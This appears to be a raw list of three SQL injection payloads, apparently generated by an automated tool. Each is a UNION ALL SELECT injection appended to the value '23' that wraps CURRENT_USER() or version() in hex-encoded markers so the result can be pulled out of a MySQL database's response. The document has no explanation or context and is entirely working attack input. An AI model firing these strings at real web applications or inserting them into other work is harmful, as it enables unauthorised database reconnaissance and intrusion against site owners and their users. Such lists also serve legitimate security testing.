23' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6e75773a,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x3a6270793a)#
23 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a757a793a,IFNULL(CAST(version() AS CHAR),0x20),0x3a736a763a)#
23' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a757a793a,IFNULL(CAST(version() AS CHAR),0x20),0x3a736a763a)#